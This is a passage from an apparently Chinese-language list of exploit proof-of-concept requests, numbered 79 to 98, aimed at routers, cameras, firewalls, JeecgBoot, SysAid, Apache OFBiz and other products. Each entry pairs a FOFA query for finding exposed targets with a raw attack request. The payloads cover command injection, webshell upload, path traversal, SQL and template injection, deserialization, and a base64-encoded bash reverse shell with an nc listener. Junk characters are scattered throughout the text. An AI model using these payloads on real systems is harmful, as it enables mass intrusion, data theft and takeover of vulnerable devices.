+ x' E! Z5 u- O/ lHost: x.x.x.x
9 D7 |2 f' g8 x" d
7 ^0 B" g7 O% R8 v4 ?- a- | N' V* L
79. BYTEVALUE 百为流控路由器远程命令执行4 w% t! T$ l/ F1 q
FOFA:BYTEVALUE 智能流控路由器; f# J: [" B/ l
GET /goform/webRead/open/?path=|id HTTP/1.1" r1 T' h# `& ^0 z3 ^
Host:IP
$ w7 A; h! {; y# D# S. L; x( V1 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 n- V* V) S! r7 {2 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 N/ `2 W8 s1 b7 c, vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ b* R1 w1 k; [+ b
Accept-Encoding: gzip, deflate
! t& j2 ?) G+ {+ x+ CConnection: close7 E2 V# L" X' d' Q+ y6 e: B
Upgrade-Insecure-Requests: 15 P6 [; ~" r$ L g% U3 C
" s) O9 w( A' g% a7 Z; C* K% g3 L" D. {% Z" \5 l/ e% l$ r
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
1 ] U2 `9 [ L' JFOFA:app="速达软件-公司产品"3 C: Y4 S8 g5 T# ~1 p9 I2 y
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1) Q5 Y3 [) `' f N$ i% k7 B" Q$ m
Host: x.x.x.x
* G4 O: b/ s8 Y! p; x3 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 [! V% \- r( d
Content-Length: 27
8 f- e4 ~0 P. \. u/ `) fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' D4 S, i8 Y% k4 S- W& u
Accept-Encoding: gzip, deflate
& G, e; E% ]7 h: b8 c* g: NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' `$ R& I9 ?- HConnection: close# m( W# |. E' X" B6 o
Content-Type: application/octet-stream; r5 j; @& R( g2 W' k$ h! M
Upgrade-Insecure-Requests: 1( L7 J; P# G( z2 {
o: C0 y% Y4 E<% out.print("oessqeonylzaf");%>' ]* I9 x3 [. T8 z6 s, H% |
; F. l7 k; ~# }# ~5 K* O4 Y
) D; E1 |1 j1 Q/ }GET /xykqmfxpoas.jsp HTTP/1.1
& l: o2 F0 ]: [" z' S3 {/ xHost: x.x.x.x: m0 b- v% x% L g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ N# n8 }7 ]4 A" Y, X, ?+ lConnection: close
! D. D- N' R' n/ Q: VAccept-Encoding: gzip, e+ e5 T" X3 @! H$ `
& N& }- F3 n+ {) v4 P7 g- l& N& k
3 ?* r- N) O I* R81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
" ?0 Y9 c! N- u' wFOFA:app="uniview-视频监控"& Q2 P) `$ P# ^+ g9 N& O9 s+ ^
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.14 g4 K2 C& q. A" u$ P. U
Host: x.x.x.x
s2 ]4 z: u7 u2 R% W5 y. hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; U+ v/ \+ i$ [" d$ }
Connection: close) o' t8 c3 s) ?, [
Accept-Encoding: gzip$ P: J6 s8 e* Q
$ p: N4 q) X' A" l
/ g5 f9 I. ~) B+ Y$ @
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
: l0 T6 ? t% x, p k6 Y. ~3 cFOFA:app="思福迪-LOGBASE". y% ^& {/ D' \+ s4 N, ]
POST /bhost/test_qrcode_b HTTP/1.1* D$ r2 T" B( }- `
Host: BaseURL: X4 ?4 q5 V0 `6 V5 h: I4 a6 b
User-Agent: Go-http-client/1.1
4 D% U3 B( E1 L0 [4 {6 zContent-Length: 23
2 K4 R" Y% D' `- l! ^Accept-Encoding: gzip
$ F/ F, e/ u5 }% f' kConnection: close
/ C' F$ M6 j j; BContent-Type: application/x-www-form-urlencoded
+ C! ~6 Q' a. E5 W, Z+ _Referer: BaseURL
0 H7 u' H5 r9 c k2 j5 m/ w
/ z) ?6 e! }0 Kz1=1&z2="|id;"&z3=bhost
6 h8 k, Q- O0 @
c: Q" ]! Z+ B P1 I" z
/ I1 [ u# b$ s83. JeecgBoot testConnection 远程命令执行, |0 p, [. q2 l, X0 T
FOFA:title=="JeecgBoot 企业级低代码平台"4 l+ o1 B! j' ?: a0 ?/ T3 F
/ Z& T y& r* P! s/ M" t4 v3 G
S8 [- T- E4 l- m6 O% s- X1 J9 n, PPOST /jmreport/testConnection HTTP/1.19 p" G; z' U1 V! ^' T) I
Host: x.x.x.x
( ]1 E' n- L8 R* B$ K$ i! Y5 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 e8 t( q# N+ R. T6 D0 `4 Q2 oConnection: close2 Q. i, {' G; P; ~* l6 Y
Content-Length: 8881
- Z* c7 B6 v5 \# d6 eAccept-Encoding: gzip3 |% [! i7 ]$ x5 @: S) I, A: y: @
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
$ }3 y" ` w) LContent-Type: application/json3 h- K9 u. j* W' T* f$ [( z
; y1 [' b4 Q6 H, F# B$ e; P
PAYLOAD
6 p% F2 f. m& s' X
5 k4 K( @ m9 C& ?: T8 m% ~0 Z( }84. Jeecg-Boot JimuReport queryFieldBySql 模板注入% g: a% D* h8 m# ]% N
FOFA:title=="JeecgBoot 企业级低代码平台"
2 v' a" I" _# V \- p8 ^
_( f; k3 a: ?5 e& H' L. D- b6 i! n& [8 H3 w9 h
0 P5 v4 j' ]' I
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1+ S9 `! b; u: N
Host: 192.168.40.130:80800 O |' a" J, b% e! X
User-Agent: curl/7.88.1
, k V3 A9 ^6 n9 E5 bContent-Length: 156
. E! P4 X J* r8 V5 uAccept: */*
/ g9 [9 W9 K; ]! C+ F0 BConnection: close
6 C$ W/ S3 i0 W2 v, v) e1 [Content-Type: application/json/ F3 F! m4 o; n, f& C/ w/ y
Accept-Encoding: gzip* e' n- J/ u& C+ e! p* ^
9 [ t. R/ n+ U/ w4 Z' j{+ q3 C" t5 N: e7 p' O
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",6 q2 F% N5 E1 X o# q
"type": "0"
; D# F$ u& ^# y) p9 i$ ~* v}
/ U* m7 D* S6 }+ d' F
! v, v8 J+ O& X& q# K2 X5 g, A7 C6 d, F2 _) ^7 x
85. SysAid On-premise< 23.3.36远程代码执行
1 n9 r! n% l' x& j T7 g" ]/ C" @CVE-2023-472462 u# d) z9 N% k- b
FOFA:body="sysaid-logo-dark-green.png" ; n! q( E/ P4 p( f* H
EXP数据包如下,注入哥斯拉马
# X, T* e' f2 I" @* l( U, [POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
3 }5 r5 \3 W' c+ K9 H+ ?7 sHost: x.x.x.x
1 g% A- o( Q( Z$ x9 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) D) J% z# f3 u6 s, DContent-Type: application/octet-stream9 e0 |& Q! K0 _) v
Accept-Encoding: gzip9 N& j j) q; I y ]5 N
$ s' g3 Q) Q3 x( v& |- x
PAYLOAD7 s( t* u2 I l/ F$ x6 B
( r7 i0 f$ M5 _: l. E2 J; f9 I% I9 ]回显URL:http://x.x.x.x/userfiles/index.jsp! Q- _# C) `* C; m m
2 ]6 t+ ?' g: a+ M# A( M( K P
86. 日本tosei自助洗衣机RCE3 Q$ E# u' I/ k" U2 A7 v
FOFA:body="tosei_login_check.php"; |% v9 L5 k6 m6 J. s+ r
POST /cgi-bin/network_test.php HTTP/1.1) M! p' X6 Q1 `6 W/ `
Host: x.x.x.x3 z% K* O9 b) p+ ^5 B: p" v
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( R$ l9 h/ a- o6 @- |Connection: close
" \6 C. Q$ j) X" GContent-Length: 44
. N) R% K* a! `/ Y# WAccept: */*
( `: ^4 Y- A6 NAccept-Encoding: gzip
- q2 o* A( C7 p0 W9 D& c9 iAccept-Language: en& |9 y6 b1 }7 ^
Content-Type: application/x-www-form-urlencoded" d G p4 v: _/ _& e
9 v. q+ f1 c6 Z0 K! `1 K( O0 F
host=%0acat${IFS}/etc/passwd%0a&command=ping6 z( [/ h! A' C8 y: K
( l2 _$ ]' P7 \1 O& C* h% v
0 t% }$ i F6 x1 C87. 安恒明御安全网关aaa_local_web_preview文件上传# I, w' K, w" s$ u+ g
FOFA:title="明御安全网关"/ z: A8 j) G' _' S4 t
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
9 P/ Z U1 [4 fHost: X.X.X.X
1 b @/ t {: F1 Q5 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
T$ B" Z5 }8 ]1 |% HConnection: close
0 W8 y, B9 {0 ^/ }Content-Length: 1986 \& B) v# b8 m, |4 u7 B
Accept-Encoding: gzip
( k7 ^/ C, m4 o8 C2 @; o. u7 U2 mContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd' T; J% @* C w; i+ b3 h: Y
; L7 W9 _) W, k9 n4 U1 I--qqobiandqgawlxodfiisporjwravxtvd
+ f: y; }+ v8 v' L6 r: _Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"# T2 i0 ~. |( K* o' ~( H
Content-Type: text/plain4 V* z; y4 `. i
) `, A1 w/ s! f8 {- D0 d- H
2ZqGNnsjzzU2GBBPyd8AIA7QlDq: g5 W M$ h0 Y* Z9 i* t- z
--qqobiandqgawlxodfiisporjwravxtvd--- O7 C% Z9 f' f' I! p, T+ J- K
o9 {. V: V j3 {" F
9 a; s1 z+ t8 Q: Q$ I/jfhatuwe.php
; t; ]7 {1 ~# r: R; f& ?; F' _3 j; z6 J) m3 \/ c
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
3 b# [& j$ F1 q0 L- I7 ^" |2 HFOFA:title="明御安全网关"
) d/ l) \8 [8 x9 G3 ]$ n, T' E% fGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
9 s: C6 l' f! G: Q# O* W q& pHost: x.x.x.xx.x.x.x2 C9 R. Q! L+ B1 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) o7 r8 p" U6 @& O: S6 J0 H" v3 g5 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* d# L3 M' D4 N9 v& u' vAccept-Encoding: gzip, deflate
& V* [" O6 C4 g9 b5 K4 n0 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 s1 J$ ]3 j4 F0 HConnection: close; j4 d2 N) p% j" j5 C3 X6 q1 m
) t0 L1 E9 }# H N, g) J5 Z2 R
! W; E- R& l* c4 ^" r- V
/astdfkhl.php5 x: f I" A# ^) C$ S! ?
- w: v2 M* p& Q% W89. 致远互联FE协作办公平台editflow_manager存在sql注入
: k& W2 r( g2 m0 m" pFOFA:title="FE协作办公平台" || body="li_plugins_download"1 N6 O: t. q* h' G3 k5 P
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
1 h3 f5 Q8 U7 L! f. i$ J" n0 VHost: x.x.x.x+ U, |" g- L1 v& s/ t2 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 T% I6 W% U! C. n, w+ O, MConnection: close
' ?; B- T# W+ e2 ?. a9 UContent-Length: 41
. i0 D4 j. J: z/ W# [; tContent-Type: application/x-www-form-urlencoded
) ]; X( H1 y; E7 r+ D: IAccept-Encoding: gzip
3 o1 Y1 W6 }0 q$ {& [+ }
1 W$ O% n; r7 R; U; e0 |option=2&GUID=-1'+union+select+111*222--+
* Q# ?% o& B! K( f( u: C( M2 `1 F9 F* n6 N8 z
+ R! K9 Q2 t: L90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行- M" J! K9 r! A4 I. h( I/ p5 y
FOFA:icon_hash="-1830859634"4 ?5 W8 n6 p" ^# H: Q# K
POST /php/ping.php HTTP/1.1
0 X- c/ R4 j) K) E7 `Host: x.x.x.x' f5 f# I, E+ F; Y4 J& i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
3 I# l" Y8 ^8 n+ \% ~0 sContent-Length: 51
( N* Y' p% K2 v: x" VAccept: application/json, text/javascript, */*; q=0.01
2 D- w# C+ ?- y( pAccept-Encoding: gzip, deflate
$ m& L/ W% J3 O+ ~* X3 Y% X) k7 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ S( g6 A- u1 p s- u3 C! ?
Connection: close
* A; c- L# J8 f. AContent-Type: application/x-www-form-urlencoded
* T" T3 V9 n/ E6 Q' H: e% z! N ~X-Requested-With: XMLHttpRequest
% x4 I% G$ N' w$ j% f. }+ g) o4 r3 D; j5 I- {; |
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig6 j% N) Y! [. E: g" l% C' |: W
0 f+ s2 k# ^& m1 [; c7 j5 T/ t6 t* s2 v Y( A+ p2 Y
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
( M: Z2 a$ [" y$ j$ tFOFA:title="综合安防管理平台"
. E2 U- [: V2 D8 d4 V% oGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
8 i) {) n/ ~! L- ^; jHost: your-ip/ Q) |" X5 ~* c! K$ n6 e0 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
, E' Q" {" @6 Y3 |$ `. r- W. RAccept-Encoding: gzip, deflate( W G' R! P6 s" f
Accept: */*: ?! U, [% C6 m" m; F
Connection: keep-alive# ~* ]$ q+ n6 T! c4 ~: C. u M/ q
8 n* C* R" ]: I( B- }3 i; P) N
3 x1 V" w; w2 q8 e$ `8 i' e$ K4 C
* K9 R( q, x( B( y+ V n$ u92. 海康威视运行管理中心session命令执行. S, Y; E4 d2 Q
Fastjson命令执行; n! e7 O8 n9 I4 x
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
9 V) w4 s8 L/ T6 Z5 A0 y$ g- xPOST /center/api/session HTTP/1.1
( A6 b$ R X$ E! THost:' t' x1 }. \8 C1 Z- ^6 I
Accept: application/json, text/plain, */*
6 B9 O- K( t6 ?' j/ e# A2 }Accept-Encoding: gzip, deflate
5 ?6 B0 S0 \5 ? ~; g2 eX-Requested-With: XMLHttpRequest1 Y1 O4 l7 M0 x
Content-Type: application/json;charset=UTF-8: U6 R" W. e3 L
X-Language-Type: zh_CN
$ \$ Z/ q! z [6 u3 D# xTestcmd: echo test
/ Z* |+ ]9 G& Z" u4 S+ dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36) a. F# y. U4 V8 C) u7 A
Accept-Language: zh-CN,zh;q=0.9% W; a7 \3 G/ [! G( ]0 ?/ o) \4 R
Content-Length: 5778
, K2 t1 U( D( A: a
2 y/ p, B. |# A6 T) cPAYLOAD
! W5 d4 N, V% q( w& s
' A$ }) r: N4 a' h8 i0 _: N2 a& k* [+ [: L. |& l
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传" Y9 ~) I; Q. t2 n" C! o; j
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="( k: A% }0 @/ [. |2 E1 c+ M6 ^
POST /?g=app_av_import_save HTTP/1.1
7 f h( ]# u. \; P3 j/ I9 }6 ]- LHost: x.x.x.x
( ~- { k7 n5 O aContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
, }6 ?, P9 E: F7 Y; O3 A OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" S8 a2 S# Y% G2 E6 J( I$ V, T, S6 k8 {, X- x$ ^2 j
------WebKitFormBoundarykcbkgdfx
% b. _- m# c9 H' n' JContent-Disposition: form-data; name="MAX_FILE_SIZE"
8 f! D6 Q e5 x% A+ A" V, _; z2 ^# i$ |$ t( I1 z( E% a
10000000, y% d4 {& b) ^/ [+ ^9 v+ i5 y
------WebKitFormBoundarykcbkgdfx) i' U. U6 i+ r+ N0 k
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
; J' ]- u: ~$ y" {/ ^* ?1 pContent-Type: text/plain) f5 w9 ~3 V! k
! j5 _; ]8 O6 P6 R9 r$ ~wagletqrkwrddkthtulxsqrphulnknxa5 }, n6 Y; T# M+ u: T c1 p
------WebKitFormBoundarykcbkgdfx
7 R% o0 u' W' a- H* ]Content-Disposition: form-data; name="submit_post"
! n; q" Q f% a! Y, I! h1 c) b+ A6 o8 H
obj_app_upfile
. y4 X# o( c9 \------WebKitFormBoundarykcbkgdfx. y8 g. _7 c1 K- i% r
Content-Disposition: form-data; name="__hash__"
{: \' r3 L2 L0 { b( A$ y1 _* G9 E$ S0 p; v. g k' M4 E
0b9d6b1ab7479ab69d9f71b05e0e9445: U. H; q- F7 S- P% d8 E' _
------WebKitFormBoundarykcbkgdfx--
2 A# b0 }2 }& l" t, I# [7 Q: u6 ? X
+ V) k, M4 T, b5 F
GET /attachements/xlskxknxa.txt HTTP/1.1
0 @" E) F' J. Y# Z1 mHost: xx.xx.xx.xx: K0 D E: Q2 h3 u- n/ l
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 h: b4 Z9 q4 y
9 J( {7 U* z+ d2 z
S; n0 u$ D9 t1 O% N
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传* }. C$ |$ E! z/ m- g0 {4 t
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
; `/ D4 [* P# a9 d& F/ n9 GPOST /?g=obj_area_import_save HTTP/1.1
* e9 h% q6 b' NHost: x.x.x.x
7 s4 {+ z1 V$ k3 i- @Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt! D9 a( ?! z3 L. M, r+ r& m# `. G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' K( \$ W& Z7 G; Q9 E) N+ m! N! O- O" M' Z; C0 k! V
------WebKitFormBoundarybqvzqvmt1 t) Z6 W8 H9 W; c/ @. L
Content-Disposition: form-data; name="MAX_FILE_SIZE"
& i9 e3 z4 F& Z' e% b* s% ^! m& t8 Z+ t. ^6 R6 V d( s9 ~+ {
10000000/ Y0 R( T) g- P) L1 C1 O
------WebKitFormBoundarybqvzqvmt! X8 U$ S {/ V' X6 {
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"& N. L5 x$ L, e- b, {: x" U
Content-Type: text/plain6 i" l7 c0 J' @5 [5 j, r9 w
; |1 s) b i% n8 m# H9 X' C
pxplitttsrjnyoafavcajwkvhxindhmu1 J0 c9 _$ U& Q0 p, d `
------WebKitFormBoundarybqvzqvmt
. r1 [" U8 q' ^- ZContent-Disposition: form-data; name="submit_post"
% x8 h8 P; t, Y: T- a% C
! C) @" d/ M2 E) I+ p; _, Mobj_app_upfile
( {+ T# p( \0 j9 A: _) c% D m------WebKitFormBoundarybqvzqvmt5 b( |4 ~3 Y& U( F* y
Content-Disposition: form-data; name="__hash__"
3 Q4 e) s4 y6 x9 V( r
, \& _1 P; C2 Q r) Y# ]0b9d6b1ab7479ab69d9f71b05e0e9445! [" [ z) I% h0 ?" e, b" f
------WebKitFormBoundarybqvzqvmt--5 A$ l) O; g% s
+ D: o. m6 Z, x7 B, z& x
" |5 r1 x y) o7 [+ ^$ h; T) l. I8 ~; N
GET /attachements/xlskxknxa.txt HTTP/1.1
4 V( d* x) u1 a5 B( m* N% W1 KHost: xx.xx.xx.xx
; ^+ N# F2 a7 h4 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ P- |% M" @ I7 ~) G
" d. A3 P' a/ \' O, o
) O4 y# r$ s( i. o6 t9 n( [/ y
7 U' {- h/ U$ x+ M& Q: @% c95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行. Y S( \! g G6 t1 |+ _6 w
CVE-2023-49070
- Y! c6 T7 q# D' |% l, x" [1 eFOFA:app="Apache_OFBiz") U T4 P# t9 y7 b. o6 s/ G' g
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
$ K$ ]8 u2 N6 o3 W- A9 Q/ x) U: z4 UHost: x.x.x.x8 l' _ _8 W5 G- h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% T8 x; X) _/ y0 e# ?; pConnection: close
2 E+ y8 @1 L3 v- F s( lContent-Length: 889
9 C; a) r, {0 P4 XContent-Type: application/xml0 Q$ U) N! |- l- u: o
Accept-Encoding: gzip
9 Z) |: Y0 r ^
5 g3 J t$ U& d$ H& |0 {/ f' a<?xml version="1.0"?>
+ }0 }6 i: ~8 U* O/ v* S) ^+ ~- b% T& B<methodCall>
1 [ B5 o3 c( D# A2 V <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>) G( m' R, T7 f0 H' n' P
<params>3 E3 m3 K2 k# @2 D; t' s) t
<param>! S2 S: L! S: t# k
<value>" c5 ^9 p6 D! A1 r3 j
<struct>
3 \2 [4 p0 X: L# g <member>9 m. C! ^8 e; O* Z
<name>test</name>
" r! @' i& _( X' e <value>
+ F! Q1 n' l" a( ^) a2 i& R# }& e <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>' X' f& L$ F. @- X( R
</value>
, m6 A' v2 R6 R t8 H% [/ Q4 Y5 n2 ^ </member>- h; M& }: _7 r4 {) }3 i3 Q7 h# e8 Z/ D
</struct>
: P+ s* S9 c- z$ B7 p; } Q# L% k$ K. Q" q </value>: E. |( ?4 m5 }5 v) N9 d: ^8 \: N0 w
</param>
9 j5 Z# j, ]6 E$ K- i% Q8 B </params>6 L' M0 N: u) |/ v- J( \ k" a8 n
</methodCall>
# A' ~( I. Z/ N3 y8 t
$ i& {" E& B- C7 _. G% ]$ G. @; M. `( n: Q$ b- {2 `/ @6 W
用ysoserial生成payload
% |8 }7 v4 w* Q( P& hjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
# ]$ m7 _- ?( t6 L$ M5 C( D
) Q+ Y4 z& s4 d# b2 Z
: {/ [4 V( w6 K; R& B! j& ?将生成的payload替换到上面的POC3 R( ? o3 n1 Y0 L) ~
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
% v" p4 Q% p* m! uHost: 192.168.40.130:8443( B( z3 d3 k' R0 o+ C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! f1 ]1 P% t# f+ P+ n9 `Connection: close
7 u. ]( O+ V- Y3 F2 M0 wContent-Length: 889( i2 j5 ~2 |. L5 Z1 h( y& x
Content-Type: application/xml4 O; C% Q7 u, ]; c% }
Accept-Encoding: gzip
7 u' G' m0 v3 A% w% V4 {( [
% D4 {7 l6 R6 i. W1 Q WPAYLOAD
' u1 z. G8 ~3 X1 E7 n6 H2 M8 a4 X* W! N- R, n7 U7 |6 f" a% \
96. Apache OFBiz 18.12.11 groovy 远程代码执行9 [1 ?) u+ S; Z1 \4 |# ?( a
FOFA:app="Apache_OFBiz"8 W( Y7 c$ X- d1 k
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.18 b' ?/ @( o6 f2 ^
Host: localhost:8443; v' N! ^1 h, k% X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ H; S8 z5 s+ d$ D! G( q+ HAccept: */*0 s- o$ M, W0 L( K5 V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! Y+ |- `8 {4 H4 k5 U: D+ l. s; fContent-Type: application/x-www-form-urlencoded
3 b$ {+ Y3 L! }* M% H H& l) RContent-Length: 55
! P& Q) ]4 Q% B( A* z: ?9 F0 m/ X" l! }
groovyProgram=throw+new+Exception('id'.execute().text);" x& X: F8 ^, K$ |! {5 N z% i
/ J; y, R0 U: y( u; K
* {- b% b( u9 }; P! y$ M& m' J* s反弹shell2 k- W, _$ |1 x q
在kali上启动一个监听
/ z! C6 `% y0 A2 L7 d* M1 a( Knc -lvp 7777
; j0 V3 V8 i; \/ A: N# H/ D
/ O) v/ K! e& w: `# Q$ o$ \, Z- dPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.13 r' e$ ]8 P# M" }+ p
Host: 192.168.40.130:84439 j7 w- Q6 y5 p: y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* ]9 x, s# ?) ]3 T, L- D2 G9 D+ R- pAccept: */** Z6 [5 }. O! G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 N/ |9 x/ T% c, E+ p
Content-Type: application/x-www-form-urlencoded" `5 i9 B w. @
Content-Length: 71& J) T: ~, z8 F) q' k! g
m& n. ^3 P& X! A$ N' t3 A1 \
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
. ]+ T3 A1 `6 m$ A9 ] Z: `2 j) H: V4 i8 D/ L" {
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行& D( E% a; @' ?0 L
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"4 S7 I4 x4 ^; h$ q
GET /passport/login/ HTTP/1.1
3 f& g9 Q$ u+ j2 S- i- xHost: 192.168.40.130:8085+ ]+ x8 M% m9 f. \+ a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 W5 z( M4 i. J* S, FAccept-Encoding: gzip
4 G( q; L/ p6 A( q7 H. G+ U4 s4 BConnection: close/ T% J" K5 q1 s* Y2 c, D
Cookie: rememberMe=PAYLOAD8 v% t! r; v% M
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
9 Y, _" E$ I% W6 B! e, z& `7 U* [ d' ` F$ Z6 I
" H# p( s" K2 U. M
98. SpiderFlow爬虫平台远程命令执行
7 y% | ^: h; r; o8 H$ KCVE-2024-0195
( ?% o# j, H# q% M' t$ }+ i* fFOFA:app="SpiderFlow"
, C- r" Q! z* A! | N$ \POST /function/save HTTP/1.1
6 p* u8 r; N! j0 NHost: 192.168.40.130:8088
' {# S1 ?+ f. jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 k* q% n% B# w7 y! X# w: R8 `- aConnection: close
d+ e/ }2 b/ W+ o$ T) PContent-Length: 121) j3 P* q2 g" I$ K
Accept: */*
' L' O# E/ W( f4 QAccept-Encoding: gzip, deflate
; k+ K9 D& ^# C% a4 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 N( }: I" t$ TContent-Type: application/x-www-form-urlencoded; charset=UTF-8
